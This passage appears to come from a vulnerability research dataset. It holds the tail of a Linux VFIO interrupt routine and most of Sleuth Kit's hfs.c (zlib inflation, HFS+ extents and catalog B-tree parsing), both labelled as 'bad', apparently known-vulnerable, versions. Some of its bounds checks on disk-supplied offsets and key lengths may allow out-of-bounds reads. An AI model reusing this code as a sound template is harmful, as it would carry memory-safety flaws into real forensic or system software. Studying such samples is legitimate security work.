}
break;
case VFIO_PCI_REQ_IRQ_INDEX:
switch (flags & VFIO_IRQ_SET_ACTION_TYPE_MASK) {
case VFIO_IRQ_SET_ACTION_TRIGGER:
func = vfio_pci_set_req_trigger;
break;
}
break;
}
if (!func)
return -ENOTTY;
return func(vdev, index, start, count, flags, data);
}
| ./CrossVul/dataset_final_sorted/CWE-190/c/bad_5375_1 |
crossvul-cpp_data_bad_711_0 | /*
** The Sleuth Kit
**
** This software is subject to the IBM Public License ver. 1.0,
** which was displayed prior to download and is included in the readme.txt
** file accompanying the Sleuth Kit files. It may also be requested from:
** Crucial Security Inc.
** 14900 Conference Center Drive
** Chantilly, VA 20151
**
** Copyright (c) 2009 Brian Carrier. All rights reserved.
**
** Judson Powers [jpowers@atc-nycorp.com]
** Matt Stillerman [matt@atc-nycorp.com]
** Rob Joyce [rob@atc-nycorp.com]
** Copyright (c) 2008, 2012 ATC-NY. All rights reserved.
** This file contains data developed with support from the National
** Institute of Justice, Office of Justice Programs, U.S. Department of Justice.
**
** Wyatt Banks [wbanks@crucialsecurity.com]
** Copyright (c) 2005 Crucial Security Inc. All rights reserved.
**
** Brian Carrier [carrier@sleuthkit.org]
** Copyright (c) 2003-2005 Brian Carrier. All rights reserved
**
** Copyright (c) 1997,1998,1999, International Business Machines
** Corporation and others. All Rights Reserved.
*/
/* TCT
* LICENSE
* This software is distributed under the IBM Public License.
* AUTHOR(S)
* Wietse Venema
* IBM T.J. Watson Research
* P.O. Box 704
* Yorktown Heights, NY 10598, USA
--*/
/*
** You may distribute the Sleuth Kit, or other software that incorporates
** part of all of the Sleuth Kit, in object code form under a license agreement,
** provided that:
** a) you comply with the terms and conditions of the IBM Public License
** ver 1.0; and
** b) the license agreement
** i) effectively disclaims on behalf of all Contributors all warranties
** and conditions, express and implied, including warranties or
** conditions of title and non-infringement, and implied warranties
** or conditions of merchantability and fitness for a particular
** purpose.
** ii) effectively excludes on behalf of all Contributors liability for
** damages, including direct, indirect, special, incidental and
** consequential damages such as lost profits.
** iii) states that any provisions which differ from IBM Public License
** ver. 1.0 are offered by that Contributor alone and not by any
** other party; and
** iv) states that the source code for the program is available from you,
** and informs licensees how to obtain it in a reasonable manner on or
** through a medium customarily used for software exchange.
**
** When the Sleuth Kit or other software that incorporates part or all of
** the Sleuth Kit is made available in source code form:
** a) it must be made available under IBM Public License ver. 1.0; and
** b) a copy of the IBM Public License ver. 1.0 must be included with
** each copy of the program.
*/
/** \file hfs.c
* Contains the general internal TSK HFS metadata and data unit code
*/
#include "tsk_fs_i.h"
#include "tsk_hfs.h"
#include <stdarg.h>
#ifdef TSK_WIN32
#include <string.h>
#else
#include <strings.h>
#endif
#define XSWAP(a,b) { a ^= b; b ^= a; a ^= b; }
// Compression Stuff
#ifdef HAVE_LIBZ
#include <zlib.h>
#endif
#include "lzvn.h"
// Forward declarations:
static uint8_t hfs_load_attrs(TSK_FS_FILE * fs_file);
static uint8_t hfs_load_extended_attrs(TSK_FS_FILE * file,
unsigned char *isCompressed, unsigned char *cmpType,
uint64_t * uncSize);
void error_detected(uint32_t errnum, char *errstr, ...);
void error_returned(char *errstr, ...);
#ifdef HAVE_LIBZ
/***************** ZLIB stuff *******************************/
// Adapted from zpipe.c (part of zlib) at http://zlib.net/zpipe.c
#define CHUNK 16384
/*
* Invokes the zlib library to inflate (uncompress) data.
*
* Returns an error code. Places the uncompressed data in a buffer supplied by the caller. Also
* returns the uncompressed length, and the number of compressed bytes consumed.
*
* Will stop short of the end of the compressed data if a natural end of a compression unit is reached. Using
* bytesConsumed, the caller can then advance the source pointer, and re-invoke the function. This will then
* inflate the next following compression unit in the data stream.
*
* @param source - buffer of compressed data
* @param sourceLen - length of the compressed data.
* @param dest -- buffer to hold the uncompressed results
* @param destLen -- length of the dest buffer
* @param uncompressedLength -- return of the length of the uncompressed data found.
* @param bytesConsumed -- return of the number of input bytes of compressed data used.
* @return 0 on success, a negative number on error
*/
static int
zlib_inflate(char *source, uint64_t sourceLen, char *dest, uint64_t destLen, uint64_t * uncompressedLength, unsigned long *bytesConsumed) // this is unsigned long because that's what zlib uses.
{
int ret;
unsigned have;
z_stream strm;
unsigned char in[CHUNK];
unsigned char out[CHUNK];
// Some vars to help with copying bytes into "in"
char *srcPtr = source;
char *destPtr = dest;
uint64_t srcAvail = sourceLen; //uint64_t
uint64_t amtToCopy;
uint64_t copiedSoFar = 0;
/* allocate inflate state */
strm.zalloc = Z_NULL;
strm.zfree = Z_NULL;
strm.opaque = Z_NULL;
strm.avail_in = 0;
strm.next_in = Z_NULL;
ret = inflateInit(&strm);
if (ret != Z_OK) {
error_detected(TSK_ERR_FS_READ,
"zlib_inflate: failed to initialize inflation engine (%d)",
ret);
return ret;
}
/* decompress until deflate stream ends or end of file */
do {
// Copy up to CHUNK bytes into "in" from source, advancing the pointer, and
// setting strm.avail_in equal to the number of bytes copied.
if (srcAvail >= CHUNK) {
amtToCopy = CHUNK;
srcAvail -= CHUNK;
}
else {
amtToCopy = srcAvail;
srcAvail = 0;
}
// wipe out any previous value, copy in the bytes, advance the pointer, record number of bytes.
memset(in, 0, CHUNK);
if (amtToCopy > SIZE_MAX || amtToCopy > UINT_MAX) {
error_detected(TSK_ERR_FS_READ,
"zlib_inflate: amtToCopy in one chunk is too large");
return -100;
}
memcpy(in, srcPtr, (size_t) amtToCopy); // cast OK because of above test
srcPtr += amtToCopy;
strm.avail_in = (uInt) amtToCopy; // cast OK because of above test
if (strm.avail_in == 0)
break;
strm.next_in = in;
/* run inflate() on input until output buffer not full */
do {
strm.avail_out = CHUNK;
strm.next_out = out;
ret = inflate(&strm, Z_NO_FLUSH);
if (ret == Z_NEED_DICT)
ret = Z_DATA_ERROR; // we don't have a custom dict
if (ret < 0 && ret != Z_BUF_ERROR) { // Z_BUF_ERROR is not fatal
error_detected(TSK_ERR_FS_READ,
" zlib_inflate: zlib returned error %d (%s)", ret,
strm.msg);
(void) inflateEnd(&strm);
return ret;
}
have = CHUNK - strm.avail_out;
// Is there enough space in dest to copy the current chunk?
if (copiedSoFar + have > destLen) {
// There is not enough space, so better return an error
error_detected(TSK_ERR_FS_READ,
" zlib_inflate: not enough space in inflation destination\n");
(void) inflateEnd(&strm);
return -200;
}
// Copy "have" bytes from out to destPtr, advance destPtr
memcpy(destPtr, out, have);
destPtr += have;
copiedSoFar += have;
} while ((strm.avail_out == 0) && (ret != Z_STREAM_END));
/* done when inflate() says it's done */
} while (ret != Z_STREAM_END);
if (ret == Z_STREAM_END)
*uncompressedLength = copiedSoFar;
*bytesConsumed = strm.total_in;
/* clean up and return */
(void) inflateEnd(&strm);
return ret == Z_STREAM_END ? Z_OK : Z_DATA_ERROR;
}
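/*
* Illustrative usage sketch (added note, not from the original source):
* inflating a buffer "src"/"srcLen" that holds several concatenated
* compression units into "dst"/"dstLen" (all names hypothetical).
*
* char *srcPtr = src;
* char *dstPtr = dst;
* uint64_t remaining = srcLen;
* uint64_t dstAvail = dstLen;
* while (remaining > 0) {
* uint64_t uncLen = 0;
* unsigned long consumed = 0;
* if (zlib_inflate(srcPtr, remaining, dstPtr, dstAvail,
* &uncLen, &consumed) != Z_OK)
* break;
* srcPtr += consumed;
* remaining -= consumed;
* dstPtr += uncLen;
* dstAvail -= uncLen;
* }
*/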
#endif
/* may set error up to string 1
* returns 0 on success, 1 on failure */
uint8_t
hfs_checked_read_random(TSK_FS_INFO * fs, char *buf, size_t len,
TSK_OFF_T offs)
{
ssize_t r;
r = tsk_fs_read(fs, offs, buf, len);
if (r != len) {
if (r >= 0) {
tsk_error_reset();
tsk_error_set_errno(TSK_ERR_FS_READ);
}
return 1;
}
return 0;
}
/**********************************************************************
*
* MISC FUNCS
*
**********************************************************************/
/* convert the HFS Time (seconds from 1/1/1904)
* to UNIX (UTC seconds from 1/1/1970)
* The number is borrowed from linux HFS driver source
*/
uint32_t
hfs_convert_2_unix_time(uint32_t hfsdate)
{
if (hfsdate < NSEC_BTWN_1904_1970)
return 0;
return (uint32_t) (hfsdate - NSEC_BTWN_1904_1970);
}
/**
* Convert a cnid (metadata address) to big endian array.
* This is used to create the key for tree lookups.
* @param cnid Metadata address to convert
* @param array [out] Array to write data into.
*/
static void
cnid_to_array(uint32_t cnid, uint8_t array[4])
{
array[3] = (cnid >> 0) & 0xff;
array[2] = (cnid >> 8) & 0xff;
array[1] = (cnid >> 16) & 0xff;
array[0] = (cnid >> 24) & 0xff;
}
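/*
* Worked example (added note, not from the original source): for
* cnid == 0x00010203 the resulting array is { 0x00, 0x01, 0x02, 0x03 },
* i.e. the big-endian byte order used when building B-tree search keys.
*/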
/**********************************************************************
*
* Lookup Functions
*
**********************************************************************/
/* Compares the given HFS+ Extents B-tree key to key constructed
* for finding the beginning of the data fork extents for the given
* CNID. (That is, the search key uses the given CNID and has
* fork = 0 and start_block = 0.)
*/
static int
hfs_ext_compare_keys(HFS_INFO * hfs, uint32_t cnid,
const hfs_btree_key_ext * key)
{
TSK_FS_INFO *fs = (TSK_FS_INFO *) & (hfs->fs_info);
uint32_t key_cnid;
key_cnid = tsk_getu32(fs->endian, key->file_id);
if (key_cnid < cnid)
return -1;
if (key_cnid > cnid)
return 1;
/* referring to the same cnids */
/* we are always looking for the data fork */
if (key->fork_type != HFS_EXT_KEY_TYPE_DATA)
return 1;
/* we are always looking for a start_block of zero
(interested in the beginning of the extents, regardless
of what the start_block is); all files except the bad
blocks file should have a start_block greater than
zero */
if (tsk_getu32(fs->endian, key->start_block) == 0)
return 0;
return 1;
}
/** \internal
* Returns the length of an HFS+ B-tree INDEX key based on the tree header
* structure and the length claimed in the record. With some trees,
* the length given in the record is not used.
* Note that this neither detects nor correctly handles 8-bit keys
* (which should not be present in HFS+).
*
* This does not give the right answer for the Attributes File B-tree, for some
* HFS+ file systems produced by the Apple OS, while it works for others. For
* the Attributes file, INDEX keys should always be as stated in the record itself,
* never the "maxKeyLen" of the B-tree header.
*
* In this software, this function is only invoked when dealing with the Extents file. In
* that usage, it is not sufficiently well tested to know if it always gives the right
* answer or not. We can only test that with a highly fragmented disk.
* @param hfs File System
* @param keylen Length of key as given in record
* @param header Tree header
* @returns Length of key
*/
uint16_t
hfs_get_idxkeylen(HFS_INFO * hfs, uint16_t keylen,
const hfs_btree_header_record * header)
{
TSK_FS_INFO *fs = (TSK_FS_INFO *) & (hfs->fs_info);
// if the flag is set, use the length given in the record
if (tsk_getu32(fs->endian, header->attr) & HFS_BT_HEAD_ATTR_VARIDXKEYS)
return keylen;
else
return tsk_getu16(fs->endian, header->maxKeyLen);
}
/**
* Convert the extents runs to TSK_FS_ATTR_RUN runs.
*
* @param a_fs File system to analyze
* @param a_extents Raw extents to process (in an array of 8)
* @param a_start_off Starting block offset of these runs
* @returns NULL on error or if no runs are in extents (test tsk_errno)
*/
static TSK_FS_ATTR_RUN *
hfs_extents_to_attr(TSK_FS_INFO * a_fs, const hfs_ext_desc * a_extents,
TSK_OFF_T a_start_off)
{
TSK_FS_ATTR_RUN *head_run = NULL;
TSK_FS_ATTR_RUN *prev_run = NULL;
int i;
TSK_OFF_T cur_off = a_start_off;
// since tsk_errno is checked as a return value, make sure it is clean.
tsk_error_reset();
if (tsk_verbose)
tsk_fprintf(stderr,
"hfs_extents_to_attr: Converting extents from offset %" PRIuOFF
" to runlist\n", a_start_off);
for (i = 0; i < 8; ++i) {
TSK_FS_ATTR_RUN *cur_run;
uint32_t addr = tsk_getu32(a_fs->endian, a_extents[i].start_blk);
uint32_t len = tsk_getu32(a_fs->endian, a_extents[i].blk_cnt);
if (tsk_verbose)
tsk_fprintf(stderr,
"hfs_extents_to_attr: run %i at addr %" PRIu32
" with len %" PRIu32 "\n", i, addr, len);
if ((addr == 0) && (len == 0)) {
break;
}
// make a non-resident run
if ((cur_run = tsk_fs_attr_run_alloc()) == NULL) {
error_returned(" - hfs_extents_to_attr");
return NULL;
}
cur_run->addr = addr;
cur_run->len = len;
cur_run->offset = cur_off;
if (head_run == NULL)
head_run = cur_run;
if (prev_run != NULL)
prev_run->next = cur_run;
cur_off += cur_run->len;
prev_run = cur_run;
}
return head_run;
}
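/*
* Illustrative worked example (added note, not from the original source): an
* extents array whose first two descriptors are (start_blk 100, blk_cnt 5)
* and (start_blk 200, blk_cnt 3), with the remaining descriptors zeroed and
* a_start_off == 0, produces two runs: { addr 100, len 5, offset 0 } followed
* by { addr 200, len 3, offset 5 }.
*/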
/**
* Look in the extents catalog for entries for a given file. Add the runs
* to the passed attribute structure.
*
* @param hfs File system being analyzed
* @param cnid file id of file to search for
* @param a_attr Attribute to add extents runs to
* @param dataForkQ if true, then find extents for the data fork. If false, then find extents for the Resource fork.
* @returns 1 on error and 0 on success
*/
static uint8_t
hfs_ext_find_extent_record_attr(HFS_INFO * hfs, uint32_t cnid,
TSK_FS_ATTR * a_attr, unsigned char dataForkQ)
{
TSK_FS_INFO *fs = (TSK_FS_INFO *) & (hfs->fs_info);
uint16_t nodesize; /* size of nodes (all, regardless of the name) */
uint32_t cur_node; /* node id of the current node */
char *node = NULL;
uint8_t is_done;
uint8_t desiredType;
tsk_error_reset();
if (tsk_verbose)
tsk_fprintf(stderr,
"hfs_ext_find_extent_record_attr: Looking for extents for file %"
PRIu32 " %s\n", cnid,
dataForkQ ? "data fork" : "resource fork");
if (!hfs->has_extents_file) {
// No extents file (which is optional), and so, no further extents are possible.
return 0;
}
// Are we looking for extents of the data fork or the resource fork?
desiredType =
dataForkQ ? HFS_EXT_KEY_TYPE_DATA : HFS_EXT_KEY_TYPE_RSRC;
// Load the extents attribute, if it has not been done so yet.
if (hfs->extents_file == NULL) {
ssize_t cnt;
if ((hfs->extents_file =
tsk_fs_file_open_meta(fs, NULL,
HFS_EXTENTS_FILE_ID)) == NULL) {
return 1;
}
/* cache the data attribute */
hfs->extents_attr =
tsk_fs_attrlist_get(hfs->extents_file->meta->attr,
TSK_FS_ATTR_TYPE_DEFAULT);
if (!hfs->extents_attr) {
tsk_error_errstr2_concat
(" - Default Attribute not found in Extents File");
return 1;
}
// cache the extents file header
cnt = tsk_fs_attr_read(hfs->extents_attr, 14,
(char *) &(hfs->extents_header),
sizeof(hfs_btree_header_record), 0);
if (cnt != sizeof(hfs_btree_header_record)) {
if (cnt >= 0) {
tsk_error_reset();
tsk_error_set_errno(TSK_ERR_FS_READ);
}
tsk_error_set_errstr2
("hfs_ext_find_extent_record_attr: Error reading header");
return 1;
}
}
// allocate a node buffer
nodesize = tsk_getu16(fs->endian, hfs->extents_header.nodesize);
if ((node = (char *) tsk_malloc(nodesize)) == NULL) {
return 1;
}
/* start at root node */
cur_node = tsk_getu32(fs->endian, hfs->extents_header.rootNode);
/* if the root node is zero, then the extents btree is empty */
/* if no files have overflow extents, the Extents B-tree still
exists on disk, but is an empty B-tree containing only
the header node */
if (cur_node == 0) {
if (tsk_verbose)
tsk_fprintf(stderr, "hfs_ext_find_extent_record: "
"empty extents btree\n");
free(node);
return 0;
}
if (tsk_verbose)
tsk_fprintf(stderr, "hfs_ext_find_extent_record: starting at "
"root node %" PRIu32 "; nodesize = %"
PRIu16 "\n", cur_node, nodesize);
/* Recurse down to the needed leaf nodes and then go forward */
is_done = 0;
while (is_done == 0) {
TSK_OFF_T cur_off; /* start address of cur_node */
uint16_t num_rec; /* number of records in this node */
ssize_t cnt;
hfs_btree_node *node_desc;
// sanity check
if (cur_node > tsk_getu32(fs->endian,
hfs->extents_header.totalNodes)) {
tsk_error_set_errno(TSK_ERR_FS_GENFS);
tsk_error_set_errstr
("hfs_ext_find_extent_record_attr: Node %d too large for file",
cur_node);
free(node);
return 1;
}
// read the current node
cur_off = (TSK_OFF_T)cur_node * nodesize;
if (tsk_verbose)
tsk_fprintf(stderr,
"hfs_ext_find_extent_record: reading node %" PRIu32
" at offset %" PRIuOFF "\n", cur_node, cur_off);
cnt = tsk_fs_attr_read(hfs->extents_attr, cur_off,
node, nodesize, 0);
if (cnt != nodesize) {
if (cnt >= 0) {
tsk_error_reset();
tsk_error_set_errno(TSK_ERR_FS_READ);
}
tsk_error_set_errstr2
("hfs_ext_find_extent_record_attr: Error reading node %d at offset %"
PRIuOFF, cur_node, cur_off);
free(node);
return 1;
}
// process the header / descriptor
if (nodesize < sizeof(hfs_btree_node)) {
tsk_error_set_errno(TSK_ERR_FS_GENFS);
tsk_error_set_errstr
("hfs_ext_find_extent_record_attr: Node size %d is too small to be valid", nodesize);
free(node);
return 1;
}
node_desc = (hfs_btree_node *) node;
num_rec = tsk_getu16(fs->endian, node_desc->num_rec);
if (num_rec == 0) {
tsk_error_set_errno(TSK_ERR_FS_GENFS);
tsk_error_set_errstr
("hfs_ext_find_extent_record: zero records in node %"
PRIu32, cur_node);
free(node);
return 1;
}
        /* With an index node, find the record with the largest key that is
         * smaller than or equal to cnid */
if (node_desc->type == HFS_BT_NODE_TYPE_IDX) {
uint32_t next_node = 0;
int rec;
if (tsk_verbose)
tsk_fprintf(stderr,
"hfs_ext_find_extent_record: Index node %" PRIu32
" @ %" PRIu64 " has %" PRIu16 " records\n", cur_node,
cur_off, num_rec);
for (rec = 0; rec < num_rec; ++rec) {
int cmp;
size_t rec_off;
hfs_btree_key_ext *key;
// get the record offset in the node
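                // (record offsets are stored as big-endian 16-bit values in a
                // table that grows backwards from the end of the node; the
                // offset of record 0 occupies the last two bytes of the node)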
rec_off =
tsk_getu16(fs->endian,
&node[nodesize - (rec + 1) * 2]);
if (rec_off + sizeof(hfs_btree_key_ext) > nodesize) {
tsk_error_set_errno(TSK_ERR_FS_GENFS);
tsk_error_set_errstr
("hfs_ext_find_extent_record_attr: offset of record %d in index node %d too large (%d vs %"
PRIu16 ")", rec, cur_node, (int) rec_off,
nodesize);
free(node);
return 1;
}
key = (hfs_btree_key_ext *) & node[rec_off];
cmp = hfs_ext_compare_keys(hfs, cnid, key);
if (tsk_verbose)
tsk_fprintf(stderr,
"hfs_ext_find_extent_record: record %" PRIu16
" ; keylen %" PRIu16 " (FileId: %" PRIu32
", ForkType: %" PRIu8 ", StartBlk: %" PRIu32
"); compare: %d\n", rec, tsk_getu16(fs->endian,
key->key_len), tsk_getu32(fs->endian,
key->file_id), key->fork_type,
tsk_getu32(fs->endian, key->start_block), cmp);
/* save the info from this record unless it is bigger than cnid */
if ((cmp <= 0) || (next_node == 0)) {
hfs_btree_index_record *idx_rec;
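                    // (keylen counts the 2-byte key_len field itself plus the
                    // key data; the child node pointer follows the key)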
int keylen =
2 + hfs_get_idxkeylen(hfs, tsk_getu16(fs->endian,
key->key_len), &(hfs->extents_header));
if (rec_off + keylen > nodesize) {
tsk_error_set_errno(TSK_ERR_FS_GENFS);
                    tsk_error_set_errstr
                        ("hfs_ext_find_extent_record_attr: offset and key length of record %d in index node %d too large (%d vs %"
PRIu16 ")", rec, cur_node,
(int) rec_off + keylen, nodesize);
free(node);
return 1;
}
idx_rec =
(hfs_btree_index_record *) & node[rec_off +
keylen];
next_node = tsk_getu32(fs->endian, idx_rec->childNode);
}
// we are bigger than cnid, so move on to the next node
if (cmp > 0) {
break;
}
}
// check if we found a relevant node, if not stop.
if (next_node == 0) {
if (tsk_verbose)
tsk_fprintf(stderr,
"hfs_ext_find_extent_record_attr: did not find any keys for %d in index node %d",
cnid, cur_node);
is_done = 1;
break;
}
cur_node = next_node;
}
        /* With a leaf node, we process records until we are past cnid, moving right to the next leaf when we can */
else if (node_desc->type == HFS_BT_NODE_TYPE_LEAF) {
int rec;
if (tsk_verbose)
tsk_fprintf(stderr,
"hfs_ext_find_extent_record: Leaf node %" PRIu32 " @ %"
PRIu64 " has %" PRIu16 " records\n", cur_node, cur_off,
num_rec);
for (rec = 0; rec < num_rec; ++rec) {
size_t rec_off;
hfs_btree_key_ext *key;
uint32_t rec_cnid;
hfs_extents *extents;
TSK_OFF_T ext_off = 0;
int keylen;
TSK_FS_ATTR_RUN *attr_run;
// get the record offset in the node
rec_off =
tsk_getu16(fs->endian,
&node[nodesize - (rec + 1) * 2]);
                if (rec_off + sizeof(hfs_btree_key_ext) > nodesize) {
tsk_error_set_errno(TSK_ERR_FS_GENFS);
tsk_error_set_errstr
("hfs_ext_find_extent_record_attr: offset of record %d in leaf node %d too large (%d vs %"
PRIu16 ")", rec, cur_node, (int) rec_off,
nodesize);
free(node);
return 1;
}
key = (hfs_btree_key_ext *) & node[rec_off];
if (tsk_verbose)
tsk_fprintf(stderr,
"hfs_ext_find_extent_record: record %" PRIu16
"; keylen %" PRIu16 " (%" PRIu32
", %" PRIu8 ", %" PRIu32 ")\n", rec,
tsk_getu16(fs->endian, key->key_len),
tsk_getu32(fs->endian, key->file_id),
key->fork_type, tsk_getu32(fs->endian,
key->start_block));
rec_cnid = tsk_getu32(fs->endian, key->file_id);
// see if this record is for our file
// OLD logic, just handles the DATA fork
// if (rec_cnid < cnid) {
// continue;
// }
// else if ((rec_cnid > cnid)
// || (key->fork_type != HFS_EXT_KEY_TYPE_DATA)) {
// is_done = 1;
// break;
// }
// NEW logic, handles both DATA and RSRC forks.
if (rec_cnid < cnid) {
continue;
}
if (rec_cnid > cnid) {
is_done = 1;
break;
}
if (key->fork_type != desiredType) {
if (dataForkQ) {
is_done = 1;
break;
}
else
continue;
}
// OK, this is one of the extents records that we are seeking, so save it.
// Make sure there is room for the hfs_extents struct
keylen = 2 + tsk_getu16(fs->endian, key->key_len);
if (rec_off + keylen + sizeof(hfs_extents) > nodesize) {
tsk_error_set_errno(TSK_ERR_FS_GENFS);
                    tsk_error_set_errstr
                        ("hfs_ext_find_extent_record_attr: offset and key length of record %d in leaf node %d too large (%d vs %"
PRIu16 ")", rec, cur_node, (int) rec_off + keylen,
nodesize);
free(node);
return 1;
}
// get the starting offset of this extent
ext_off = tsk_getu32(fs->endian, key->start_block);
// convert the extents to the TSK format
extents = (hfs_extents *) & node[rec_off + keylen];
attr_run =
hfs_extents_to_attr(fs, extents->extents, ext_off);
if ((attr_run == NULL) && (tsk_error_get_errno() != 0)) {
tsk_error_errstr2_concat
(" - hfs_ext_find_extent_record_attr");
free(node);
return 1;
}
if (tsk_fs_attr_add_run(fs, a_attr, attr_run)) {
tsk_error_errstr2_concat
(" - hfs_ext_find_extent_record_attr");
free(node);
return 1;
}
}
cur_node = tsk_getu32(fs->endian, node_desc->flink);
if (cur_node == 0) {
is_done = 1;
break;
}
}
else {
tsk_error_set_errno(TSK_ERR_FS_GENFS);
tsk_error_set_errstr("hfs_ext_find_extent_record: btree node %"
PRIu32 " (%" PRIuOFF ") is neither index nor leaf (%" PRIu8
")", cur_node, cur_off, node_desc->type);
free(node);
return 1;
}
}
free(node);
return 0;
}
/** \internal
* Compares two Catalog B-tree keys.
* @param hfs File System being analyzed
* @param key1 Key 1 to compare
* @param key2 Key 2 to compare
* @returns -1 if key1 is smaller, 0 if equal, and 1 if key1 is larger
*/
int
hfs_cat_compare_keys(HFS_INFO * hfs, const hfs_btree_key_cat * key1,
const hfs_btree_key_cat * key2)
{
TSK_FS_INFO *fs = (TSK_FS_INFO *) & (hfs->fs_info);
uint32_t cnid1, cnid2;
cnid1 = tsk_getu32(fs->endian, key1->parent_cnid);
cnid2 = tsk_getu32(fs->endian, key2->parent_cnid);
if (cnid1 < cnid2)
return -1;
if (cnid1 > cnid2)
return 1;
return hfs_unicode_compare(hfs, &key1->name, &key2->name);
}
/** \internal
*
* Traverse the HFS catalog file. Call the callback for each
* record.
*
* @param hfs File system
* @param a_cb callback
* @param ptr Pointer to pass to callback
* @returns 1 on error
*/
uint8_t
hfs_cat_traverse(HFS_INFO * hfs,
TSK_HFS_BTREE_CB a_cb, void *ptr)
{
TSK_FS_INFO *fs = &(hfs->fs_info);
uint32_t cur_node; /* node id of the current node */
char *node;
uint16_t nodesize;
uint8_t is_done = 0;
tsk_error_reset();
nodesize = tsk_getu16(fs->endian, hfs->catalog_header.nodesize);
if ((node = (char *) tsk_malloc(nodesize)) == NULL)
return 1;
/* start at root node */
cur_node = tsk_getu32(fs->endian, hfs->catalog_header.rootNode);
    /* if the root node is zero, then the catalog btree is empty */
    /* (unlike the Extents B-tree, the Catalog B-tree should never be empty
       on a valid volume, so this is treated as an error) */
    if (cur_node == 0) {
        if (tsk_verbose)
            tsk_fprintf(stderr, "hfs_cat_traverse: "
                "empty catalog btree\n");
free(node);
return 1;
}
if (tsk_verbose)
tsk_fprintf(stderr, "hfs_cat_traverse: starting at "
"root node %" PRIu32 "; nodesize = %"
PRIu16 "\n", cur_node, nodesize);
/* Recurse down to the needed leaf nodes and then go forward */
is_done = 0;
while (is_done == 0) {
TSK_OFF_T cur_off; /* start address of cur_node */
uint16_t num_rec; /* number of records in this node */
ssize_t cnt;
hfs_btree_node *node_desc;
// sanity check
if (cur_node > tsk_getu32(fs->endian,
hfs->catalog_header.totalNodes)) {
tsk_error_set_errno(TSK_ERR_FS_GENFS);
tsk_error_set_errstr
("hfs_cat_traverse: Node %d too large for file", cur_node);
free(node);
return 1;
}
// read the current node
        cur_off = (TSK_OFF_T)cur_node * nodesize;
cnt = tsk_fs_attr_read(hfs->catalog_attr, cur_off,
node, nodesize, 0);
if (cnt != nodesize) {
if (cnt >= 0) {
tsk_error_reset();
tsk_error_set_errno(TSK_ERR_FS_READ);
}
tsk_error_set_errstr2
("hfs_cat_traverse: Error reading node %d at offset %"
PRIuOFF, cur_node, cur_off);
free(node);
return 1;
}
// process the header / descriptor
if (nodesize < sizeof(hfs_btree_node)) {
tsk_error_set_errno(TSK_ERR_FS_GENFS);
tsk_error_set_errstr
("hfs_cat_traverse: Node size %d is too small to be valid", nodesize);
free(node);
return 1;
}
node_desc = (hfs_btree_node *) node;
num_rec = tsk_getu16(fs->endian, node_desc->num_rec);
if (tsk_verbose)
tsk_fprintf(stderr, "hfs_cat_traverse: node %" PRIu32
" @ %" PRIu64 " has %" PRIu16 " records\n",
cur_node, cur_off, num_rec);
if (num_rec == 0) {
tsk_error_set_errno(TSK_ERR_FS_GENFS);
tsk_error_set_errstr("hfs_cat_traverse: zero records in node %"
PRIu32, cur_node);
free(node);
return 1;
}
        /* With an index node, find the record with the largest key that is
         * smaller than or equal to the target key (as judged by the callback) */
if (node_desc->type == HFS_BT_NODE_TYPE_IDX) {
uint32_t next_node = 0;
int rec;
for (rec = 0; rec < num_rec; ++rec) {
size_t rec_off;
hfs_btree_key_cat *key;
uint8_t retval;
uint16_t keylen;
// get the record offset in the node
rec_off =
tsk_getu16(fs->endian,
&node[nodesize - (rec + 1) * 2]);
                if (rec_off + 2 > nodesize) {
tsk_error_set_errno(TSK_ERR_FS_GENFS);
tsk_error_set_errstr
("hfs_cat_traverse: offset of record %d in index node %d too large (%d vs %"
PRIu16 ")", rec, cur_node, (int) rec_off,
nodesize);
free(node);
return 1;
}
key = (hfs_btree_key_cat *) & node[rec_off];
keylen = 2 + tsk_getu16(hfs->fs_info.endian, key->key_len);
                if (rec_off + keylen > nodesize) {
                    tsk_error_set_errno(TSK_ERR_FS_GENFS);
                    tsk_error_set_errstr
                        ("hfs_cat_traverse: offset and length of key %d in index node %d too large (%d vs %"
                        PRIu16 ")", rec, cur_node, (int) (rec_off + keylen), nodesize);
free(node);
return 1;
}
/*
if (tsk_verbose)
tsk_fprintf(stderr,
"hfs_cat_traverse: record %" PRIu16
" ; keylen %" PRIu16 " (%" PRIu32 ")\n", rec,
tsk_getu16(fs->endian, key->key_len),
tsk_getu32(fs->endian, key->parent_cnid));
*/
                /* hand this record to the callback; it decides whether to descend via this child */
retval =
a_cb(hfs, HFS_BT_NODE_TYPE_IDX, key,
cur_off + rec_off, ptr);
if (retval == HFS_BTREE_CB_ERR) {
tsk_error_set_errno(TSK_ERR_FS_GENFS);
tsk_error_set_errstr2
("hfs_cat_traverse: Callback returned error");
free(node);
return 1;
}
// record the closest entry
else if ((retval == HFS_BTREE_CB_IDX_LT)
|| (next_node == 0)) {
hfs_btree_index_record *idx_rec;
int keylen =
2 + hfs_get_idxkeylen(hfs, tsk_getu16(fs->endian,
key->key_len), &(hfs->catalog_header));
if (rec_off + keylen > nodesize) {
tsk_error_set_errno(TSK_ERR_FS_GENFS);
                        tsk_error_set_errstr
                            ("hfs_cat_traverse: offset and key length of record %d in index node %d too large (%d vs %"
PRIu16 ")", rec, cur_node,
(int) rec_off + keylen, nodesize);
free(node);
return 1;
}
idx_rec =
(hfs_btree_index_record *) & node[rec_off +
keylen];
next_node = tsk_getu32(fs->endian, idx_rec->childNode);
}
if (retval == HFS_BTREE_CB_IDX_EQGT) {
// move down to the next node
break;
}
}
// check if we found a relevant node
if (next_node == 0) {
tsk_error_set_errno(TSK_ERR_FS_GENFS);
tsk_error_set_errstr
("hfs_cat_traverse: did not find any keys in index node %d",
cur_node);
is_done = 1;
break;
}
// TODO: Handle multinode loops
if (next_node == cur_node) {
tsk_error_set_errno(TSK_ERR_FS_GENFS);
tsk_error_set_errstr
("hfs_cat_traverse: node %d references itself as next node",
cur_node);
is_done = 1;
break;
}
cur_node = next_node;
}
/* With a leaf, we look for the specific record. */
else if (node_desc->type == HFS_BT_NODE_TYPE_LEAF) {
int rec;
for (rec = 0; rec < num_rec; ++rec) {
size_t rec_off;
hfs_btree_key_cat *key;
uint8_t retval;
uint16_t keylen;
// get the record offset in the node
rec_off =
tsk_getu16(fs->endian,
&node[nodesize - (rec + 1) * 2]);
                if (rec_off + 2 > nodesize) {
tsk_error_set_errno(TSK_ERR_FS_GENFS);
tsk_error_set_errstr
("hfs_cat_traverse: offset of record %d in leaf node %d too large (%d vs %"
PRIu16 ")", rec, cur_node, (int) rec_off,
nodesize);
free(node);
return 1;
}
key = (hfs_btree_key_cat *) & node[rec_off];
keylen = 2 + tsk_getu16(hfs->fs_info.endian, key->key_len);
                if (rec_off + keylen > nodesize) {
